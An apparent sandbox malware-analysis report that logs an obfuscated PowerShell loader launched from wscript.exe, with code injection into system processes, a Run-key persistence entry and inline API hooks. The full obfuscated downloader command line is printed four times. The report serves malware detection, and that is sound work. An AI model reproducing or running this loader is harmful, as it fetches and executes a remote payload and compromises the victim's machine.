Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering';If (${host}.CurrentCulture) {$Fortrd++;}Function Jimmis($Poria){$Jumpily=$Poria.Length-$Fortrd;$Anteopercle='SUBsTRI';$Anteopercle+='ng';For( $Racialisation=4;$Racialisation -lt $Jumpily;$Racialisation+=5){$Fantasibilledernes+=$Poria.$Anteopercle.Invoke( $Racialisation, $Fortrd);}$Fantasibilledernes;}function Fluorideringen($Uncouthly){ . ($Flanconnade) ($Uncouthly);}$Hoosegow=Jimmis 'Un.eMSklvoFlipz ,deiR,prlSpa lk,nnaAlle/Or,i5tilb. ,dn0Bran Sam,(UndeWCrediJo.nnImprdUdsno Udlw HorsBesl aldNBemyTPrim Vas.1Neig0 Kem.Irri0,lde;Bl,t .onaWRe,aiPaahn .on6 Tre4Wagg; arm Bru.xK rs6Nost4Educ; Wo. CounrklorvB.ot:Lysa1regn2Fald1Xmas. Ans0 S.d)Elek KrooGUstiemuhacRestk acoo S.j/came2 P,e0Pa.r1Sk m0Skil0H al1Radr0Foot1Vomi CharFTovaiStikrLeveeOverf FrdoGoloxBrss/unde1Majo2 enn1Okke.Prdi0S,nn ';$Neurocanal151=Jimmis 'UlydUEmpesSloweIlsarQ,nd- .laA PrigInteeGleanFishtskin ';$Skumredes=Jimmis 'BrochSp,ktbookt .onpfac,sStri:Male/ Afa/ Carl DisaRafrrBiocrSvelyB,cof Undr AngaPre,n UngkBree.StancMaybpPal.a ,an/HereN.bekeU,orgDiamuAnoms M t8Cons5Eoga.S.udcIdylshe,lv Gra ';$Minty=Jimmis 'Mero>Jamr ';$Flanconnade=Jimmis ' M.liSidee Sslx.ype ';$Lansquenet='Guls';$Andejagterne = Jimmis 'VelkeSlaucFl.nhNontohydr L.m%Aadsapa.ap SubpForsdCa iaviv.tMiddaP,la%Semi\SikkC SidoE,tanRskncToogoRdbyrSpaddPersaCo elOhmm6 yd.MounU chedHydasForb Am m&Gall& St. SingeMoancT,reh Truo Ade Forbt Hyp ';Fluorideringen (Jimmis 'Piep$.lyhgTreblAc roAntib Arbakumeltest: F.lMW.ttykryso ,hapres.lObfuaFumisHoustSwaniLaarcKons=E,te(HavfcLsevm Litd Sv. ok e/R ascMonc ,mmi$Da,eA Ke niri,dHoddeber j entaAx igParatCodaeIdenrUnpen kiheU.ad)Symp ');Fluorideringen (Jimmis 'Bdep$MirkgWea.lPreco Sexb UheaEighlVgel:DenoM UnseGodit,ambh ageosk,ldRe pi P.ezOminiRealn A,vgFrdi=anet$BlomSBombkSlanu Re.mTakirNa oeDeted rateFrolsSkri.Jords RegpEvanl .ipiAerotBrne(He e$FornM ResiOve.nHvidtorobyKo i)ba,a ');Fluorideringen (Jimmis ' er[deerNBlomeK.sttNig,.ReveSCohaeSlumrSk.fvPro,iKni c ybeTandPFrago Ob iDetan Hu,tArr.MBogbaGorenGra.aNonbgHjste Ungr raa]afgr:Fors: SukSunteedevocJantuLighrVoksiSmletCol.yM.toPPro rTahio.ourt Aflo UdvcLynto N,tl Til Scin= bin Dis,[Br dN DeveD,litObtu.LubeS kaeSmugc Resu SclrQuediInfrtZardy HyaPUnprrlrdooScout CraoMalpcmi,io OsclOplaT ordyNeappRe aeHaak] cuc:Sh
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering';If (${host}.CurrentCulture) {$Fortrd++;}Function Jimmis($Poria){$Jumpily=$Poria.Length-$Fortrd;$Anteopercle='SUBsTRI';$Anteopercle+='ng';For( $Racialisation=4;$Racialisation -lt $Jumpily;$Racialisation+=5){$Fantasibilledernes+=$Poria.$Anteopercle.Invoke( $Racialisation, $Fortrd);}$Fantasibilledernes;}function Fluorideringen($Uncouthly){ . ($Flanconnade) ($Uncouthly);}$Hoosegow=Jimmis 'Un.eMSklvoFlipz ,deiR,prlSpa lk,nnaAlle/Or,i5tilb. ,dn0Bran Sam,(UndeWCrediJo.nnImprdUdsno Udlw HorsBesl aldNBemyTPrim Vas.1Neig0 Kem.Irri0,lde;Bl,t .onaWRe,aiPaahn .on6 Tre4Wagg; arm Bru.xK rs6Nost4Educ; Wo. CounrklorvB.ot:Lysa1regn2Fald1Xmas. Ans0 S.d)Elek KrooGUstiemuhacRestk acoo S.j/came2 P,e0Pa.r1Sk m0Skil0H al1Radr0Foot1Vomi CharFTovaiStikrLeveeOverf FrdoGoloxBrss/unde1Majo2 enn1Okke.Prdi0S,nn ';$Neurocanal151=Jimmis 'UlydUEmpesSloweIlsarQ,nd- .laA PrigInteeGleanFishtskin ';$Skumredes=Jimmis 'BrochSp,ktbookt .onpfac,sStri:Male/ Afa/ Carl DisaRafrrBiocrSvelyB,cof Undr AngaPre,n UngkBree.StancMaybpPal.a ,an/HereN.bekeU,orgDiamuAnoms M t8Cons5Eoga.S.udcIdylshe,lv Gra ';$Minty=Jimmis 'Mero>Jamr ';$Flanconnade=Jimmis ' M.liSidee Sslx.ype ';$Lansquenet='Guls';$Andejagterne = Jimmis 'VelkeSlaucFl.nhNontohydr L.m%Aadsapa.ap SubpForsdCa iaviv.tMiddaP,la%Semi\SikkC SidoE,tanRskncToogoRdbyrSpaddPersaCo elOhmm6 yd.MounU chedHydasForb Am m&Gall& St. SingeMoancT,reh Truo Ade Forbt Hyp ';Fluorideringen (Jimmis 'Piep$.lyhgTreblAc roAntib Arbakumeltest: F.lMW.ttykryso ,hapres.lObfuaFumisHoustSwaniLaarcKons=E,te(HavfcLsevm Litd Sv. ok e/R ascMonc ,mmi$Da,eA Ke niri,dHoddeber j entaAx igParatCodaeIdenrUnpen kiheU.ad)Symp ');Fluorideringen (Jimmis 'Bdep$MirkgWea.lPreco Sexb UheaEighlVgel:DenoM UnseGodit,ambh ageosk,ldRe pi P.ezOminiRealn A,vgFrdi=anet$BlomSBombkSlanu Re.mTakirNa oeDeted rateFrolsSkri.Jords RegpEvanl .ipiAerotBrne(He e$FornM ResiOve.nHvidtorobyKo i)ba,a ');Fluorideringen (Jimmis ' er[deerNBlomeK.sttNig,.ReveSCohaeSlumrSk.fvPro,iKni c ybeTandPFrago Ob iDetan Hu,tArr.MBogbaGorenGra.aNonbgHjste Ungr raa]afgr:Fors: SukSunteedevocJantuLighrVoksiSmletCol.yM.toPPro rTahio.ourt Aflo UdvcLynto N,tl Til Scin= bin Dis,[Br dN DeveD,litObtu.LubeS kaeSmugc Resu SclrQuediInfrtZardy HyaPUnprrlrdooScout CraoMalpcmi,io OsclOplaT ordyNeappRe aeHaak] cuc:Sh
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering';If (${host}.CurrentCulture) {$Fortrd++;}Function Jimmis($Poria){$Jumpily=$Poria.Length-$Fortrd;$Anteopercle='SUBsTRI';$Anteopercle+='ng';For( $Racialisation=4;$Racialisation -lt $Jumpily;$Racialisation+=5){$Fantasibilledernes+=$Poria.$Anteopercle.Invoke( $Racialisation, $Fortrd);}$Fantasibilledernes;}function Fluorideringen($Uncouthly){ . ($Flanconnade) ($Uncouthly);}$Hoosegow=Jimmis 'Un.eMSklvoFlipz ,deiR,prlSpa lk,nnaAlle/Or,i5tilb. ,dn0Bran Sam,(UndeWCrediJo.nnImprdUdsno Udlw HorsBesl aldNBemyTPrim Vas.1Neig0 Kem.Irri0,lde;Bl,t .onaWRe,aiPaahn .on6 Tre4Wagg; arm Bru.xK rs6Nost4Educ; Wo. CounrklorvB.ot:Lysa1regn2Fald1Xmas. Ans0 S.d)Elek KrooGUstiemuhacRestk acoo S.j/came2 P,e0Pa.r1Sk m0Skil0H al1Radr0Foot1Vomi CharFTovaiStikrLeveeOverf FrdoGoloxBrss/unde1Majo2 enn1Okke.Prdi0S,nn ';$Neurocanal151=Jimmis 'UlydUEmpesSloweIlsarQ,nd- .laA PrigInteeGleanFishtskin ';$Skumredes=Jimmis 'BrochSp,ktbookt .onpfac,sStri:Male/ Afa/ Carl DisaRafrrBiocrSvelyB,cof Undr AngaPre,n UngkBree.StancMaybpPal.a ,an/HereN.bekeU,orgDiamuAnoms M t8Cons5Eoga.S.udcIdylshe,lv Gra ';$Minty=Jimmis 'Mero>Jamr ';$Flanconnade=Jimmis ' M.liSidee Sslx.ype ';$Lansquenet='Guls';$Andejagterne = Jimmis 'VelkeSlaucFl.nhNontohydr L.m%Aadsapa.ap SubpForsdCa iaviv.tMiddaP,la%Semi\SikkC SidoE,tanRskncToogoRdbyrSpaddPersaCo elOhmm6 yd.MounU chedHydasForb Am m&Gall& St. SingeMoancT,reh Truo Ade Forbt Hyp ';Fluorideringen (Jimmis 'Piep$.lyhgTreblAc roAntib Arbakumeltest: F.lMW.ttykryso ,hapres.lObfuaFumisHoustSwaniLaarcKons=E,te(HavfcLsevm Litd Sv. ok e/R ascMonc ,mmi$Da,eA Ke niri,dHoddeber j entaAx igParatCodaeIdenrUnpen kiheU.ad)Symp ');Fluorideringen (Jimmis 'Bdep$MirkgWea.lPreco Sexb UheaEighlVgel:DenoM UnseGodit,ambh ageosk,ldRe pi P.ezOminiRealn A,vgFrdi=anet$BlomSBombkSlanu Re.mTakirNa oeDeted rateFrolsSkri.Jords RegpEvanl .ipiAerotBrne(He e$FornM ResiOve.nHvidtorobyKo i)ba,a ');Fluorideringen (Jimmis ' er[deerNBlomeK.sttNig,.ReveSCohaeSlumrSk.fvPro,iKni c ybeTandPFrago Ob iDetan Hu,tArr.MBogbaGorenGra.aNonbgHjste Ungr raa]afgr:Fors: SukSunteedevocJantuLighrVoksiSmletCol.yM.toPPro rTahio.ourt Aflo UdvcLynto N,tl Til Scin= bin Dis,[Br dN DeveD,litObtu.LubeS kaeSmugc Resu SclrQuediInfrtZardy HyaPUnprrlrdooScout CraoMalpcmi,io OsclOplaT ordyNeappRe aeHaak] cuc:Sh Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering';If (${host}.CurrentCulture) {$Fortrd++;}Function Jimmis($Poria){$Jumpily=$Poria.Length-$Fortrd;$Anteopercle='SUBsTRI';$Anteopercle+='ng';For( $Racialisation=4;$Racialisation -lt $Jumpily;$Racialisation+=5){$Fantasibilledernes+=$Poria.$Anteopercle.Invoke( $Racialisation, $Fortrd);}$Fantasibilledernes;}function Fluorideringen($Uncouthly){ . ($Flanconnade) ($Uncouthly);}$Hoosegow=Jimmis 'Un.eMSklvoFlipz ,deiR,prlSpa lk,nnaAlle/Or,i5tilb. ,dn0Bran Sam,(UndeWCrediJo.nnImprdUdsno Udlw HorsBesl aldNBemyTPrim Vas.1Neig0 Kem.Irri0,lde;Bl,t .onaWRe,aiPaahn .on6 Tre4Wagg; arm Bru.xK rs6Nost4Educ; Wo. CounrklorvB.ot:Lysa1regn2Fald1Xmas. Ans0 S.d)Elek KrooGUstiemuhacRestk acoo S.j/came2 P,e0Pa.r1Sk m0Skil0H al1Radr0Foot1Vomi CharFTovaiStikrLeveeOverf FrdoGoloxBrss/unde1Majo2 enn1Okke.Prdi0S,nn ';$Neurocanal151=Jimmis 'UlydUEmpesSloweIlsarQ,nd- .laA PrigInteeGleanFishtskin ';$Skumredes=Jimmis 'BrochSp,ktbookt .onpfac,sStri:Male/ Afa/ Carl DisaRafrrBiocrSvelyB,cof Undr AngaPre,n UngkBree.StancMaybpPal.a ,an/HereN.bekeU,orgDiamuAnoms M t8Cons5Eoga.S.udcIdylshe,lv Gra ';$Minty=Jimmis 'Mero>Jamr ';$Flanconnade=Jimmis ' M.liSidee Sslx.ype ';$Lansquenet='Guls';$Andejagterne = Jimmis 'VelkeSlaucFl.nhNontohydr L.m%Aadsapa.ap SubpForsdCa iaviv.tMiddaP,la%Semi\SikkC SidoE,tanRskncToogoRdbyrSpaddPersaCo elOhmm6 yd.MounU chedHydasForb Am m&Gall& St. SingeMoancT,reh Truo Ade Forbt Hyp ';Fluorideringen (Jimmis 'Piep$.lyhgTreblAc roAntib Arbakumeltest: F.lMW.ttykryso ,hapres.lObfuaFumisHoustSwaniLaarcKons=E,te(HavfcLsevm Litd Sv. ok e/R ascMonc ,mmi$Da,eA Ke niri,dHoddeber j entaAx igParatCodaeIdenrUnpen kiheU.ad)Symp ');Fluorideringen (Jimmis 'Bdep$MirkgWea.lPreco Sexb UheaEighlVgel:DenoM UnseGodit,ambh ageosk,ldRe pi P.ezOminiRealn A,vgFrdi=anet$BlomSBombkSlanu Re.mTakirNa oeDeted rateFrolsSkri.Jords RegpEvanl .ipiAerotBrne(He e$FornM ResiOve.nHvidtorobyKo i)ba,a ');Fluorideringen (Jimmis ' er[deerNBlomeK.sttNig,.ReveSCohaeSlumrSk.fvPro,iKni c ybeTandPFrago Ob iDetan Hu,tArr.MBogbaGorenGra.aNonbgHjste Ungr raa]afgr:Fors: SukSunteedevocJantuLighrVoksiSmletCol.yM.toPPro rTahio.ourt Aflo UdvcLynto N,tl Til Scin= bin Dis,[Br dN DeveD,litObtu.LubeS kaeSmugc Resu SclrQuediInfrtZardy HyaPUnprrlrdooScout CraoMalpcmi,io OsclOplaT ordyNeappRe aeHaak] cuc:Sh Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_00C8ACA0 LoadLibraryW,GetProcAddress,GetProcAddress,WTSEnumerateSessionsW,GetProcessHeap,HeapAlloc,WTSFreeMemory,WTSFreeMemory,WTSQuerySessionInformationW,WTSQuerySessionInformationW,StrCmpIW,GetProcessHeap,HeapAlloc,SafeArrayCreateVector,SafeArrayAccessData,SysAllocString,SafeArrayUnaccessData,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,WTSFreeMemory,WTSFreeMemory,WTSFreeMemory,SafeArrayDestroy,SysFreeString, 25_2_00C8ACA0
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FFAAB780BE8 pushad ; retf 12_2_00007FFAAB780C6D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 12_2_00007FFAAB8554BA push ebp; iretd 12_2_00007FFAAB855538
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_0474EC78 pushfd ; retf 16_2_0474EC79
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_075C1D28 push eax; mov dword ptr [esp], ecx 16_2_075C21B4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_075C21A8 push eax; mov dword ptr [esp], ecx 16_2_075C21B4
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_0826386A pushad ; retf 16_2_08263871
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_0826387D pushfd ; retf 16_2_08263881
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 16_2_0826369D push ebx; iretd 16_2_082636DA
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_224209AD push ecx; mov dword ptr [esp], ecx 20_2_224209B6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2235EB1E push esp; retn 0000h 20_2_2235EB1F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2235EB02 push esp; retn 0000h 20_2_2235EB03
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2235E9B5 push esp; retn 0000h 20_2_2235EAE7
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2239EB1E push esp; retn 0000h 20_2_2239EB1F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2239EB02 push esp; retn 0000h 20_2_2239EB03
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 20_2_2239E9B5 push esp; retn 0000h 20_2_2239EAE7
Source: C:\Windows\explorer.exe Code function: 22_2_093569B5 push esp; retn 0000h 22_2_09356AE7
Source: C:\Windows\explorer.exe Code function: 22_2_09356B1E push esp; retn 0000h 22_2_09356B1F
Source: C:\Windows\explorer.exe Code function: 22_2_09356B02 push esp; retn 0000h 22_2_09356B03
Source: C:\Windows\explorer.exe Code function: 22_2_09AFD9B5 push esp; retn 0000h 22_2_09AFDAE7
Source: C:\Windows\explorer.exe Code function: 22_2_09AFDB02 push esp; retn 0000h 22_2_09AFDB03
Source: C:\Windows\explorer.exe Code function: 22_2_09AFDB1E push esp; retn 0000h 22_2_09AFDB1F
Source: C:\Windows\explorer.exe Code function: 22_2_0B316B1E push esp; retn 0000h 22_2_0B316B1F
Source: C:\Windows\explorer.exe Code function: 22_2_0B316B02 push esp; retn 0000h 22_2_0B316B03
Source: C:\Windows\explorer.exe Code function: 22_2_0B3169B5 push esp; retn 0000h 22_2_0B316AE7
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_00C929BD push ecx; ret 25_2_00C929D0
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_00C9252C push ecx; ret 25_2_00C9253F
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_044409AD push ecx; mov dword ptr [esp], ecx 25_2_044409B6
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_001EC22A push BE707C3Eh; ret 25_2_001EC22F
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_001EC4B7 push eax; retf 25_2_001EC4B8
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_001ED4A5 push eax; ret 25_2_001ED4F8
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_001ED4FB push eax; ret 25_2_001ED562
Source: C:\Windows\SysWOW64\raserver.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run KFRL5VBPUBT Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run KFRL5VBPUBT Jump to behavior

Hooking and other Techniques for Hiding and Protection
barindex
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8E 0xEE 0xEC
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
